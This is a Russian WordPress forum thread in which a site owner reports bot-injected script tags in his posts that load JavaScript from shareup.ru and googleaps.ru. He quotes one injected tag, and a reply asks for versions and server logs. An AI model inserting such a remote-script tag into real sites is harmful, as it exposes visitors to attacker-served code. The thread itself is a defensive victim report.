Уязвимость wordpress. Инъекция кода: shareup.ru, googleaps.ru

  • nemoroz

    (@nemoroz)


    10 лет, 8 месяцев назад

    Уже второй раз за неделю пострадал от инъекции кода прямо в базу данных в записи первый раз со скриптом с сайта googleaps.ru второй раз со скриптом с сайта shareup.ru
    Вот типичный пример инъекции. Старается вставляться в выделенные слова, стронги и другие, чтобы повысить кликабельность.
    <script src=\»//shareup.ru/social.js\» type=\»text/javascript\»></script>
    Проблема не в паролях, орудует точно бот. Нагуглил уже тысячи сайтов с такой же проблемой. Это уязвимость wordpress или каких то плагинов.
    Спасает пока то, что файлики скрипта пока пустые, видимо хозяин пока тренируется. А вот если хозяин ботнета один раз загрузит скрипты, то будет мама не горюй.
    Спасайте!

Просмотр 1 ответа (всего 1)
  • Flector

    (@flector)

    10 лет, 8 месяцев назад

    с чего вы взяли, что они пустые?
    это вам могут пустые файлы отдаваться.

    с этой проблемой тут уже есть топики.
    но ни один человек не удосужился собрать анамнез:

    версия wp, тема, названия и версии плагинов, серверного софта.
    и ни один человек не изучал логи сервера.

Просмотр 1 ответа (всего 1)

Тема «Уязвимость wordpress. Инъекция кода: shareup.ru, googleaps.ru» закрыта для новых ответов.